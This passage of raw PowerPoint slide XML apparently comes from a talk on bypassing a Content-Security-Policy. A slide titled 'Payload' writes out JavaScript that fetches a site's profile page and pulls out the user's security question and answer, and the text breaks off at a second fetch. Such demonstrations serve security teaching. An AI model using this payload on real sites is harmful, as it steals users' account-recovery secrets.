              <a:t> 'self' data: cdn.jsdelivr.net 'unsafe-inline’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>object-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none';</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1231642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1</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Hotjar</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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Objective #1 – Security Answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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530962" y="266596"/>
            <a:ext cx="7468721" cy="6324808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>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C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>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6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// This is the HTML from our response as a text string</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOMParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parseFromString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"text/html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>security_question</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>security_answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>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DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
